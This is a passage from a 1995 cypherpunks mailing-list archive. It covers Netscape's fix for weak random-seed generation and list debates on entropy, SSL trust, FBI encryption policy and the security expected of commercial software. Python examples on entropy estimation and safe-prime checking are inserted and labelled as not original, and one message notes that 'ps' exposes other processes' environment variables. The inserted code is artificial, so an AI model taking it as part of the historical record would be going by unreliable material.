following a review by internal and outside experts, are in response to the
potential vulnerability in the company's security implementation discovered
last weekend by two University of California at Berkeley students.  In
addition, Netscape is taking the opportunity to include other improvements
with this update.

Netscape addressed the potential vulnerability by increasing the amount of
random information it uses to seed the random number generator in its
security implementation.  In Netscape's security approach, the random
number generated is used in a mathematical formula to create a "session
key" for encrypting information to be sent across the Internet.  The new
solution uses many times more random information than the previous version,
ensuring much greater degrees of difficulty in identifying the key used to
encrypt a particular session.  The solution is also now assembled in a
platform-dependent manner which, when combined with the increase in random
information, makes Netscape's products substantially more secure than
before the update.

Netscape's source code that will be used to address the potential
vulnerability has already been posted on the Internet so that it can be
reviewed by anyone wishing to do so.  This technique is often used in the
development of security software to ensure the highest level of inspection
possible before the final software is made available to customers.  The
code is also being reviewed by external security experts retained by
Netscape and various Netscape platform partners with expertise in specific
operating system environments to provide additional checks on the soundness
of Netscape's approach.

"We have always encouraged users to provide feedback on new versions of our
software, and our posting of this security source code on the Internet is a
natural extension of that approach," said  Mike Homer, vice president of
marketing at Netscape.  "We plan to continue to use the Internet to test
new software versions, as we will shortly with the beta version of our
newly announced Netscape Navigator 2.0.  We expect that this kind of open
review will help us continue to create products of the highest quality."

Netscape is using the opportunity of this week's beta releases to also
update other portions of its software, addressing such issues as
domain-name limitations in international versions of Netscape Navigator
and potential stack overflow conditions.  Netscape is also placing the beta
versions of the security updates for its Netscape servers on the Internet
for free download by customers.

"We process hundreds of customer orders daily using Netscape software.
Netscape's commitment to excellence as evidenced by the company's immediate
action in response to reported vulnerabilities is one of the many reasons
Internet Shopping Network has chosen Netscape products for conducting
Internet commerce," said Randy Adams, president of Internet Shopping
Network.  "We have built a multi-million dollar business on the Internet
using Netscape products and they are a major factor in our success."

The beta versions of the updated software -- Netscape Navigator 1.2.1b for
Windows, Netscape Navigator 1.1.1b for Macintosh and UNIX, Netscape
Commerce Server 1.1.1b, and Netscape Proxy Server 1.1.1b -- will be
available on Wednesday for downloading from Netscape's home page at
http://home.netscape.com.  All Netscape users are encouraged to download
the new versions as soon as possible to ensure they are using the most
up-to-date security software from Netscape.  Final versions of the updates
will be posted after all testing is complete.

Netscape Communications Corporation is a premier provider of open software
to enable people and companies to exchange information and conduct commerce
over the Internet and other global networks. The company was founded in
April 1994 by Dr. James H. Clark, founder of Silicon Graphics, Inc., a
Fortune 500 computer systems company;  and Marc Andreessen, creator of the
NCSA Mosaic research prototype for the Internet.  Traded on Nasdaq under
the symbol "NSCP", Netscape Communications Corporation is based in Mountain
View, California.
###
Additional information on Netscape Communications Corporation is available
on the Internet at http://home.netscape.com, by sending email to
info@netscape.com or by calling 415-528-2555.

Netscape Communications, the Netscape Communications logo, Netscape,
Netscape Navigator, Netscape Commerce Server and Netscape Proxy Server are
trademarks of Netscape Communications Corporation.  All other product names
are trademarks of their respective companies.

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




Rosanne M. Siino
Director of Corporate Communications
Netscape Communications Corp.
415-528-2619





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Mon, 25 Sep 95 13:30:55 PDT
To: cypherpunks@toad.com
Subject: Re: List of US representitives
Message-ID: <199509252028.QAA18640@book.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In article <00996ED487C83F20.00003C77@sanchez.com>, gorkab@sanchez.com
("Brian Gorka") wrote:

>Someone posted a list of US reps awhile back...  Can someone forward me a
>copy?

Everything you need to know to put pressure on Congress critters is at
http://www.NRA.org/pub/congress/104/
I especially recommend http://www.NRA.org/pub/congress/104/congress.awk.Z
- From the readme: "congress.awk is a comma-seperated database of congress
members & some unix awk code for manipulating the database"

- -- 
- -- Lucky Green <mailto:shamrock@netcom.com>
   PGP encrypted mail preferred.
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMGcQ9ioZzwIn1bdtAQHKLwGAnzE6f67qn0bZFVcOV/49gemiD9jAluJo
ageYFxFsIIbkD9q28/a/7yX/GKaDNTSu
=0h5T
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mike Fletcher <fletch@ain.bls.com>
Date: Mon, 25 Sep 95 13:39:29 PDT
To: cypherpunks@toad.com
Subject: Article in 9/25 Computerworld about Netscape
Message-ID: <9509252034.AA08024@outland>
MIME-Version: 1.0
Content-Type: text/plain


Just got the Sept 25th issue of Computerworld in my box and it's got a
big first page article on the NS bugs.  They get the key lengths wrong
(30-bit and 300-bit), and they say that "... future products will also
use 300-bit keys."  And they mention Cypherpunks by name! :)

---
Fletch                                                     __`'/|
fletch@ain.bls.com  "Lisa, in this house we obey the       \ o.O'    ______
404 713-0414(w)	     Laws of Thermodynamics!" H. Simpson   =(___)= -| Ack. |
404 315-7264(h) PGP Print: 8D8736A8FC59B2E6 8E675B341E378E43  U      ------






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Herb Sutter <herbs@interlog.com>
Date: Mon, 25 Sep 95 13:39:55 PDT
To: Jon Lasser <jlasser@rwd.goucher.edu>
Subject: Re: Notes security question
Message-ID: <199509252039.QAA12982@gold.interlog.com>
MIME-Version: 1.0
Content-Type: text/plain


At 14:52 1995.09.25 -0400, Jon Lasser wrote:
>On Fri, 22 Sep 1995, Herb Sutter wrote:
>
>> While I'm at it, here's a question I've been wondering about recently: Why
>> is it I've never heard of any security issues with Lotus Notes?  Are there
>> no known weaknesses?  Or did existing weaknesses just not get much press
>> because Notes isn't a commercially visible consumer product like Netscape?
>
>Perhaps the Notes pricing scheme is sooo outrageous (by the standards of 
>a student like myself, and probably most others, if it's still anything 
>like it was at the 1.0 release) that most people have had zero opportunity 
>to examine the program, let alone really have time to play with it?

Good point.  However, since it's been around for years and is (in some
people's eyes, at least) cutting-edge secure replication technology, it made
me begin to wonder about the product's actual security.  All I know is that
they use one of RSADSI's libraries, since RSADSI mentions them in their
"here are our current users" advertising.

From the deafening silence, though, it seems like there's not a whole lot of
information or opinion either way on Notes' security...?

Herb

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Herb Sutter                 2228 Urwin, Suite 102       voice (416) 618-0184
Connected Object Solutions  Oakville ON Canada L6L 2T2    fax (905) 847-6019





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Barber <jeffb@sware.com>
Date: Mon, 25 Sep 95 14:13:36 PDT
To: ses@tipper.oit.unc.edu (Simon Spero)
Subject: Re: SSL Man-in-the-middle
In-Reply-To: <Pine.SOL.3.91.950925124443.359B-100000@chivalry>
Message-ID: <9509252112.AA29743@wombat.sware.com>
MIME-Version: 1.0
Content-Type: text/plain


Simon Spero writes:

> Exactly - the trust model used in Navigator 1.1N requires you to trust 
> every single owner of a valid certificate. Getting hold of any key is 
> vastly easier than having to obtain a specific key; in the worst case, 
> you just buy your own - SSL exchanges are repudiable, and a few simple 
> tricks can make sure your certificate doesn't show up in the "Document 
         ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
> Information" dialog box.

I'd appreciate some documentation for this, please.  How can you make
this happen?


-- Jeff



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Van Wie <dvw@hamachi.epr.com>
Date: Mon, 25 Sep 95 16:20:48 PDT
To: cypherpunks <cypherpunks@toad.com>
Subject: Re: `Random' seed.
Message-ID: <306738C3@hamachi>
MIME-Version: 1.0
Content-Type: text/plain



Matt Blaze <mab@crypto.com> wrote:

>Here's my current favorite quick-and-dirty true-random-in-software
>generator.
>Use at own risk and read the comments carefully...
[...]
> *      Physically random numbers (very nearly uniform)
> *      D. P. Mitchell
> *      Modified by Matt Blaze 2/95
[...]
> * WARNING: depending on the particular platform, truerand() output may
> * be biased or correlated.  In general, you can expect about 16 bits of
> * "pseudo-entropy" out of each 32 bit word returned by truerand(),
> * but it may not be uniformly diffused.

While this comment provides some general information, it does not give the 
expected entropy in the form of testable assumptions.  A first step in this 
direction is to provide the entropy series used to arrive at the 16 bit per 
32 bit word estimate.  The second step, as I recommended last week (RE: RNG 
Resource FAQ... on 9/22), is to provide a concise argument drawn directly 
from the mathematical weaknesses of the entropy series.  In that post, I 
posed the following four criteria because they address the mathematical 
(theoretical) weaknesses of the entropy series, while using a vocabulary 
that should be sensible to a rigorous designer:

1)  The states exist and can be identified.
2)  The number of states n is known.
3)  The index value i uniquely identifies a state.
4)  The function P_i is known and well-behaved.

In this way, an analyst can review both the entropy series itself, and a 
_concise_ statement of the criteria under which the series is defined (i.e. 
when the 4 mathematical weaknesses have been appropriately addressed), and 
the argument "why" has been scrutinized against the code or proposed design.

dvw
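
[Added example, not part of the original message: the entropy series E = sum of -P_i log_2(P_i), evaluated over constructed samples, to show why the four criteria matter. Counting each bit separately misidentifies the states and overstates the entropy of a correlated source. All names and sample data below are assumptions made for this illustration; this is not the truerand() code.]

```python
# Added illustration: entropy series over constructed samples.
import math
from collections import Counter


def shannon_entropy(probs):
    """E = sum over states of -P_i * log2(P_i), in bits."""
    return sum(-p * math.log2(p) for p in probs if p > 0)


def min_entropy(probs):
    """-log2 of the most likely state: the bound a guessing attacker faces."""
    return -math.log2(max(probs))


def joint_distribution(samples):
    """Empirical P_i where a state is the whole output word.

    Only meaningful when the sample count is much larger than the number
    of states n (criterion 2), which is rarely true for 32-bit words.
    """
    counts = Counter(samples)
    total = len(samples)
    return [c / total for c in counts.values()]


def per_bit_estimate(samples, width):
    """Sum of single-bit entropies. Valid only if the bits are independent."""
    total = len(samples)
    bits = 0.0
    for i in range(width):
        p1 = sum((s >> i) & 1 for s in samples) / total
        bits += shannon_entropy([p1, 1.0 - p1])
    return bits


def analyse(samples, width):
    probs = joint_distribution(samples)
    return {
        "states_seen": len(probs),
        "per_bit": per_bit_estimate(samples, width),
        "shannon": shannon_entropy(probs),
        "min_entropy": min_entropy(probs),
    }


# Constructed sample 1: 8-bit words whose high nibble copies the low nibble.
# Every bit looks perfectly balanced, yet only 16 distinct states exist.
CORRELATED = [(x << 4) | x for x in range(16)] * 4

# Constructed sample 2: 2-bit words with P = 1/2, 1/4, 1/8, 1/8.
BIASED = [0] * 32 + [1] * 16 + [2] * 8 + [3] * 8

if __name__ == "__main__":
    for name, data, width in (("correlated", CORRELATED, 8),
                              ("biased", BIASED, 2)):
        r = analyse(data, width)
        print(f"{name:10s} states={r['states_seen']:3d} "
              f"per-bit={r['per_bit']:.3f} shannon={r['shannon']:.3f} "
              f"min-entropy={r['min_entropy']:.3f}")
```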




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Van Wie <dvw@hamachi.epr.com>
Date: Mon, 25 Sep 95 16:35:08 PDT
To: "Timothy C. May" <tcmay@got.net>
Subject: RE: More on "Entropy"
Message-ID: <30673C18@hamachi>
MIME-Version: 1.0
Content-Type: text/plain



David Van Wie wrote:

>>The entropy E is defined by the sum across n states of -P_i log_2(P_i),

Timothy C. May wrote:

>Hah! Another physicist converted to the information-theoretic view of
>entropy!

Indeed.  I was able to track down the literature, and it is most 
interesting.  I am still a little bit skeptical of the "superset including 
thermodynamic entropy" school of thought, but I haven't finished reading all 
of the materials yet!  Clearly, the IT "version" of entropy is a well 
defined and useful thing....

>I should've pointed out in my reading list that several names stand out in
>this interpretation:

I'll read with that endorsement in mind.  Your thoughts on rigorous, 
_concise_, design criteria for sources of entropy would be appreciated 
(unless there is good quality work in the literature I haven't come to yet).

dvw




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Van Wie <dvw@hamachi.epr.com>
Date: Mon, 25 Sep 95 16:48:37 PDT
To: "'cypherpunks'" <cypherpunks@toad.com>
Subject: RE: Netscape "random" number seed generator code available
Message-ID: <30673F3B@hamachi>
MIME-Version: 1.0
Content-Type: text/plain



Phil Karlton wrote:

>[You will be expected to show your work. :-)]

In the spirit of showing work, how about a run through the entropy series?

dvw




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Phil Karn <karn@qualcomm.com>
Date: Tue, 26 Sep 95 06:31:45 PDT
To: ipsec-dev@eit.com
Subject: Primality verification needed
Message-ID: <199509260050.RAA14732@servo.qualcomm.com>
MIME-Version: 1.0
Content-Type: text/plain


Hi. I've generated a 2047-bit "strong" prime number that I would like to
use with Diffie-Hellman key exchange. I assert that not only is this number
'p' prime, but so is (p-1)/2.

I've used the mpz_probab_prime() function in the Gnu Math Package (GMP) version
1.3.2 to test this number. This function uses the Miller-Rabin primality test.
However, to increase my confidence that this number really is a strong prime,
I'd like to ask others to confirm it with other tests. Here's the number in hex:


The generator, g, for this prime is 2.

Thanks!

Phil Karn
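
[Added example, not part of the original message and not GMP's code: an independent Miller-Rabin check of the two claims made for a Diffie-Hellman modulus, that p and (p-1)/2 are both prime, plus the order of the generator g. The function names are assumptions, and the inputs are small constructed values, not the number from the post.]

```python
# Added illustration: verify a claimed "strong" (safe) prime p = 2q + 1.
import random

SMALL_PRIMES = (2, 3, 5, 7, 11, 13, 17, 19, 23, 29, 31, 37)


def is_probable_prime(n, rounds=40, rng=None):
    """Miller-Rabin. False: certainly composite. True: probably prime."""
    if n < 2:
        return False
    for sp in SMALL_PRIMES:
        if n == sp:
            return True
        if n % sp == 0:
            return False
    # Write n - 1 = 2^s * d with d odd.
    d, s = n - 1, 0
    while d % 2 == 0:
        d //= 2
        s += 1
    rng = rng or random.SystemRandom()
    # Fixed small bases first, then independent random bases.
    bases = list(SMALL_PRIMES)
    bases += [rng.randrange(2, n - 1) for _ in range(rounds)]
    for a in bases:
        x = pow(a, d, n)
        if x in (1, n - 1):
            continue
        for _ in range(s - 1):
            x = pow(x, 2, n)
            if x == n - 1:
                break
        else:
            return False  # a is a witness that n is composite
    return True


def order_of_g(g, p, q):
    """Order of g modulo a safe prime p = 2q + 1: one of 1, 2, q, 2q."""
    for k in (1, 2, q, 2 * q):
        if pow(g, k, p) == 1:
            return k
    raise ValueError("g is not a unit modulo p")


def check_dh_params(p_hex, g=2, rounds=40):
    """Check a modulus given as hex text (whitespace and line breaks allowed)."""
    p = int("".join(p_hex.split()), 16)
    q = (p - 1) // 2
    report = {
        "bits": p.bit_length(),
        "p_prime": is_probable_prime(p, rounds),
        "q_prime": p % 2 == 1 and is_probable_prime(q, rounds),
        "g_order": None,
    }
    report["safe_prime"] = report["p_prime"] and report["q_prime"]
    if report["safe_prime"]:
        k = order_of_g(g % p, p, q)
        if k == 2 * q:
            report["g_order"] = "2q"   # g generates the whole group
        elif k == q:
            report["g_order"] = "q"    # g generates the prime-order subgroup
        else:
            report["g_order"] = "degenerate"
    return report


# Constructed inputs (not taken from the message above):
SAFE_FULL = "3fb"               # 1019 = 2*509 + 1, and 2 has order 2q
SAFE_SUBGROUP = "17"            # 23 = 2*11 + 1, and 2 has order q
NOT_SAFE = "7" + "f" * 31       # 2^127 - 1: prime, but (p-1)/2 is composite

if __name__ == "__main__":
    for label, h in (("1019", SAFE_FULL), ("23", SAFE_SUBGROUP),
                     ("2^127-1", NOT_SAFE)):
        print(label, check_dh_params(h))
```

With g = 2 and a safe prime, the order is 2q when p is 3 mod 8 and q when p is 7 mod 8, so the last hex digit of the modulus already tells a verifier which case to expect.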





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@polaris.mindport.net>
Date: Mon, 25 Sep 95 15:09:18 PDT
To: John Young <jya@pipeline.com>
Subject: Re: Golden Coy Freeh
In-Reply-To: <199509251253.IAA07006@pipe4.nyc.pipeline.com>
Message-ID: <Pine.SUN.3.91.950925180515.4198A-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 25 Sep 1995, John Young wrote:

>    The New York Times, January 25, 1995, p. D5.
> 
>    The F.B.I. Sting Operation on Child Pornography Raises
>    Questions About Cryptography
> 
>    By Peter H. Lewis
> 
> 
>    Last week, Mr. Freeh stressed that he preferred a voluntary
>    approach. But "if consensus is impossible" on the
>    encryption issue, he said, the F.B.I. might consider other
>    approaches.
> 

I think it *tremendously* disturbing that the F.B.I. suddenly thinks 
itself part of the Legislative branch, able to make law and dictate 
policy to the rest of the country.

In fact there is a plague of this kind of thing, law making in the wrong 
channels, as if the executive agencies in the United States were suddenly 
able to implement their own law.

I think the F.B.I. needs to act like the Executive agency it is, advise 
the president, and then generally shut up.

In short, like small children, the F.B.I. should be seen, and not heard.

Unfortunately, I believe the children in this case will be Citizens of 
the United States.

> 
>    [End]

---
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sharborth@hai-net.com
Date: Mon, 25 Sep 95 15:08:05 PDT
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: Net KiddiePorn Hype on TV
Message-ID: <9508258120.AA812078118@houston_cc_smtp.hai-net.com>
MIME-Version: 1.0
Content-Type: text/plain


     That's not all.  This morning I was listening to National Peoples 
     Radio when there was a story about the "Cyber Angels."  It appears 
     that the "Guardian Angels" from NYC are now out on the net trying to 
     catch people talking about child pornography.  
     
     This will be real interesting to watch.  I don't remember all of the 
     story, but the best part I heard was when some "Cyber Angel" was 
     talking about listening to a chat session and according to her, GIFs are 
     codewords for pornography.
     
     wsh


______________________________ Reply Separator _________________________________
Subject: Net KiddiePorn Hype on TV
Author:  cypherpunks@toad.com (Cypherpunks Mailing List) at internet
Date:    25-09-95 11:28


Yet Another Alarmist TV Show About Child Molesters on the Net:
     
During their coverage of an NFL game on Sunday, the Fox announcers plugged 
an upcoming episode (sometime this week) of _New York Undercover_. They 
used a depressing line like "Think the Net is a safe place to play ?  Think 
again !"  Apparently the show will portray a child molester luring kids via 
the Net, etc., etc. "In a story pulled straight from today's headlines !"
     
Anyway, the mainstream media trashing of the Net continues. Check your local 
listings.
     
-Futplex <futplex@pseudonym.com>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Mon, 25 Sep 95 15:17:56 PDT
To: cypherpunks@toad.com
Subject: Re: PM's Netscape rant
Message-ID: <v02120d09ac8cd874354d@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain


At 3:24 PM 9/25/95, Vladimir Z. Nuri wrote:
> however I haven't seen any
>well-deserved rebuttals however, so..

I believe I've seen enough.

<*PLONK!*>

Now, that's why I *bought* Eudora...

Cheers,
Bob Hettinga

-----------------
Robert Hettinga (rah@shipwright.com)
Shipwright Development Corporation, 44 Farquhar Street, Boston, MA 02131
USA (617) 323-7923
"Reality is not optional." --Thomas Sowell
>>>>Phree Phil: Email: zldf@clark.net  http://www.netresponse.com/zldf <<<<<






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jon Mittelhauser <jonm@netscape.com>
Date: Mon, 25 Sep 95 11:19:15 PDT
To: cypherpunks@toad.com
Subject: Re: Netscape "random" number seed generator code available
In-Reply-To: <445j6k$h03@tera.mcom.com>
Message-ID: <446rp8$14h@tera.mcom.com>
MIME-Version: 1.0
Content-Type: text/plain


adam@lighthouse.homeport.org (Adam Shostack) wrote:
>Jeff Weinstein wrote:
>| 
>|   More on the RNG stuff.  On Unix systems we look for ~/.pgp/randseed.bin,
>| and feed it through the RNG hash.  On Unix and PC systems we feed the
>| environment through the hash, so that would be a good place for a
>| concerned user to put some random stuff of their own.
>
>On a SunOS (or any BSD) box ps -e will get you environment variables.
>
>ps -eaxuw
>USER       PID %CPU %MEM   SZ  RSS TT STAT START  TIME COMMAND
>root        53  0.0  0.0   68    0 ?  IW   Sep 19  0:02 portmap HOME=/
>PATH=/bin:/usr/bin:/usr/etc:/usr/ucb
>root        68  0.0  0.0   16    0 ?  I    Sep 19  0:00  (biod)
>root        58  0.0  0.0   40    0 ?  IW   Sep 19  0:00 keyserv HOME=/
>PATH=/bin:/usr/bin:/usr/etc:/usr/ucb

If you take a look at the code you will see that this (and a ton of
other things) are already being done...Jeff is only pointing out
an extra item which is of special interest to the people in this
group...we are no longer relying on any single item of data but
rather a very large set and constant re-seeding during idle loops...

-Jon






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@polaris.mindport.net>
Date: Mon, 25 Sep 95 15:25:36 PDT
To: "Vladimir Z. Nuri" <vznuri@netcom.com>
Subject: Re: PM's Netscape rant
In-Reply-To: <199509251924.MAA05096@netcom18.netcom.com>
Message-ID: <Pine.SUN.3.91.950925181054.4198B-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 25 Sep 1995, Vladimir Z. Nuri wrote:

> I thoroughly enjoyed PM's vituperative, venomous, and vitriolic
> Netscape rant. it just wouldn't be the cypherpunks list without 
> the pit bull of the internet nipping at everyone's heels here
> and slaying any unwarranted peace!! however I haven't seen any 
> well-deserved rebuttals however, so..
> 
> I'm again going to be a netscape apologist and say, GEEZ, PM, 
> will you take it easy, and untangle your underwear knots?
> 
> as has been pointed out numerous times, the encryption in the Netscape
> code is designed to handle credit card number transport, *not*
> actual cash transport. it's really silly to have more security
> present than is available than the weakest link. it would be like
> worrying about a fence around the white house when one is giving
> open tours to the public every day!!

Uh, there is a fence around the White House and they do give daily tours.

I might add that there are a good number of people who worry about it 
every day.

I might also add that it is even more silly to design a software package, 
where additional security might easily be added, which has too little 
security to be expanded into other roles.  This is called 'designed 
obsolescence.'  Wells Fargo bank is allowing account transactions over 
their webpage, one assumes this does, or will soon include "cash transfers."

> 
> PM is rather secretive about the systems he is working on, but
> I suspect they are stock systems that must be highly secure because
> they actually involve *transfer* of cash, and *large*amounts* of it,
> in a *time-critical* environment, with *large corporate clients*.  these
> are all inappropriate criteria to judge Netscape by.

I believe this is a demonstration of your lack of vision, "vznuri."  
Netscape's potential in the next 8-12 months alone dictates that they 
should be concentrating on attracting corporate clients, as does their 
new obligation to stockholders who have yet to see a penny of profit not 
related to speculation and stock price fluctuation.

> in the Netscape 
> scenario, the software is *not* transferring cash itself, *not* transferring 
> large amounts of it, and *not* in a time critical application, and *not*
> geared toward large corporations, but instead individual users. 
> it is relying on another infrastructure (credit cards) for the actual 
> transaction mechanisms.


For now, perhaps.  It seems you would have that limitation written in stone.
 
> 
> as has been pointed out numerous times, the whole
> credit card apparatus is somewhat based on "security through obscurity", 
> i.e. the obscurity of a credit card number, and it doesn't make a whole
> lot of sense to try to make this more "secure".

I'm not quite sure you mean this, but if you do, you're just small minded.
Why don't you read it again.

> this is a problem for
> credit card companies to fix (I agree it is a horrible problem, that costs
> us billions, and should have been fixed a long time ago) .. but holding
> credit card *using* companies responsible for this deficiency 
> doesn't make sense. they are not the enemy!! they would surely seize the
> most secure mechanism available, if there were alternatives.

There are, they haven't.

> the distinction is subtle, but I think a relevant one:

Then it's unfortunate that you have missed it so completely.

> is
> the software itself transferring cash, or building on another system
> that does so? hopefully in the latter case, the requirements for a
> successful implementation are not so difficult to achieve (so that
> even fresh-out-of-college CS students can call the functions to
> do so, and perhaps code packages are written such that the user
> is protected from their own naivete, or what PM would call stupidity
> or incompetence).

Looking at Netscape, and moreover, the entire set of browsing programs, 
you speak like a petty government official.  By limiting the scope of 
potential of various browsers you do nothing to further the cause of easy 
to reach strong crypto for everyone in a transparent and widely 
distributed package.  Instead you believe we should forgive Netscape its 
oversights (and carelessness) because it was never meant to transfer 
funds over the internet.  "It's a petty program, you should ignore it" is 
what you're really saying, which completely misses the fact, that 
millions of people are using/going to use it, and they are as likely to 
use it for banking as for shopping at home as for 'surfing.'

Then again, perhaps your intent was never to make strong encryption 
available to the masses.

> --
> 
> PM gives some excellent techniques for improving code security (some
> of these may not be exactly what he proposed):
> 
> 1. hiring experts
> 2. code reviews
> 3. restrictions of who can work on what code (security clearance)
> 4. heavy testing
> 5. antagonistic attacks (i.e. hiring someone trying to crack the code that
> others have written)
> 6. open review of key code
> 
> however, put all these things together and you get a company apparatus
> a bit more like the NSA than a commercial company. I agree that all
> these precautions are relevant for banking and stock transaction software
> transferring millions of dollars.  but holding a joe-schmoe GUI and 
> Web company responsible for this kind of paranoid oversight is really 
> impossible and unrealistic and *unnecessary*.
> 
> there will be some companies that specialize in creating the 
> *secure*infrastructure* for communications transactions. other companies
> will just *latch on* to this existing infrastructure. hopefully the
> requirements for *latching on* will not be too difficult, otherwise we
> are all in trouble!! 
>  
> now, admittedly, it would be ideal if the netscape code was highly
> secure, but again, I just don't think it is in the best interests of
> this company to become security paranoid to the degrees that I have
> listed above, and the extreme degrees that people here are ranting about. 
> rather they should try to blend in with other companies
> who specialize in cryptographic security. the latter companies should
> as much as possible provide foolproof modules. they should take care
> of all functions that have a potential for problem, such as random
> number generation, key exchange, etc.  they should try to provide
> a minimum of training where the code is not foolproof.
> 
> many have been making the point that one cannot judge the security of
> a package based simply on analyzing key modules. I actually don't think this 
> has been proven in general and completely resolved yet. I can imagine 
> modules that communicate with software such that the module 
> itself is a "secure environment" in general, and
> it is almost impossible to misuse the software itself. (for example,
> the software might never store the actual keys of transactions itself, 
> this being handled by a secure module, making it impossible to 
> accidentally reveal them).
> 
> some day we might actually see "secure module support" built into a 
> microprocessor. in many ways the microprocessors that guard against
> illegal memory accesses and illegal function calls are in a sense
> providing a kind of cryptographic security. and people who study
> secure OSes generally eventually conclude that for ultimate security,
> you almost have to work from the ground up, starting with memory,
> microprocessors, and network hardware.
> 
> --
> 
> so my general point is that PM's rant, while lots of fun to read..
> 
> >you @#$%^&* whippersnappers!! you don't have a @#$%^&* clue about
> >REAL code!! us old timers were writing code as secure and impenetrable
> >as granite bricks, impregnable as a frigid victorian grandmother,
> >before you were a twinkle in your mama's eye!! learn some
> >sufficient grovelling skills for your superiors or you will
> >not only be fired from your JOB but be excommunicated from the
> >entire INDUSTRY, perhaps even tarred, feathered, drawn, quartered, and
> >hung from your neck in the nearest tree!!! your employer will throw
> >you to the wolves, your customers will spit on your flayed carcass,
> >your family will look upon your shrivelled remains with shame,  the
> >vultures will vomit your undigestable eviscerated entrails,
> >and the world immediately explode, if you have a 
> >SINGLE BUFFER OVERFLOW *anywhere* in your code!!
> 
> (ahem) this is not appropriate in the context of Netscape's aims, unless they
> want to become financial transaction experts more in line with banking
> expertise. netscape is more a "bring cyberspace to the masses" company,
> not "bring secure transactions to cyberspace". it's just because so
> few companies are successfully doing the latter, that netscape is forced
> to implement some "key" aspects of it to support the former. but I suspect
> they may ease out of the cryptographic security business in the long run,
> delegating it to other companies' plug-in-packages.
> 
> furthermore, cyberspace is growing gradually. the way we get to really
> incredible secure transactions is through a growing process, an evolution
> in which mistakes are made at different levels, and which in the beginning
> the software is not much more than a toy that looks pretty and has the
> fewest moving parts and most simplistic design imaginable. 
> 
> I fully believe that some day a company in cyberspace will exist
> that satisfies PM's and all other cypherpunk's most erotic dreams 
> about secure transactions. however that day is years away and it
> will take a long time to reach it. and I doubt that it will be the
> same company that is playing around with GUI's for the end user and
> hiring college programming hot-shots and Java geeks.  IMHO netscape 
> is probably not going to be the company that will try to bring the
> *lowlevel infrastructure* for cash, judging by the current winds,
> although that could change. they will definitely help guide its
> progress and be interacting with the companies that do, however.
> 
> when the big Secure Transactions Inc.  company is invented for
> cyberspace, *then* the kinds of absolutely uncompromising  standards that PM
> embodies will be in place. but again, we cannot expect the companies
> of today to embody that ideology and atmosphere for a few years yet.
> 
> the cypherpunks play a very valuable role in finding these "growing
> pain" mistakes of beginning companies such as Netscape,
> but we are not really serving our own best interests or the 
> harmonious growth of cyberspace by vilifying/ embarrassing/ 
> browbeating/ humiliating companies or their employees over their security
> problems, at least if they are clearly responsive to far less ammunition.
> keep in mind that NSA unbreakable security is *just*not*appropriate* in
> every situation, and in fact "weak" encryption does have legitimate 
> uses (i.e. in a world where people routinely lock their keys in their
> cars). (although I agree, in general one should always try to design a 
> system to be as secure as possible.)
> 
> (oops, I used the term "we" in that paragraph, a grave cypherpunk sin.. 
> my humble apologies; @#$%^&* cryptoanarchist vocabulary)
>  
> that all said, nevertheless, I do enjoy PM's periodic displays of 
> undigestable bile eruptions at least as much as one of the other 
> infamous amusing crackpots circulating in this corner of cyberspace..
> (but geez, PM, were you raised by a pack of wild wolves or what?)
> 
> p.s. to TCM: why do you continually find my login name abbreviation so 
> fascinating??? my apologies to anyone if I am missing some kind of 
> inside joke here, I'm a little dense at times <g>
> 
> 

---
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "R. J. Harvey" <harveyrj@vt.edu>
Date: Mon, 25 Sep 95 16:13:20 PDT
To: Black Unicorn <unicorn@polaris.mindport.net>
Subject: Re: Golden Coy Freeh
Message-ID: <9509252313.AA22112@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


At 06:10 PM 9/25/95 -0400, Black Unicorn wrote:
>On Mon, 25 Sep 1995, John Young wrote:
>> 
>>    Last week, Mr. Freeh stressed that he preferred a voluntary
>>    approach. But "if consensus is impossible" on the
>>    encryption issue, he said, the F.B.I. might consider other
>>    approaches.
>> 
>
>I think it *tremendously* disturbing that the F.B.I. suddenly thinks 
>itself part of the Legislative branch, able to make law and dictate 
>policy to the rest of the country.
>
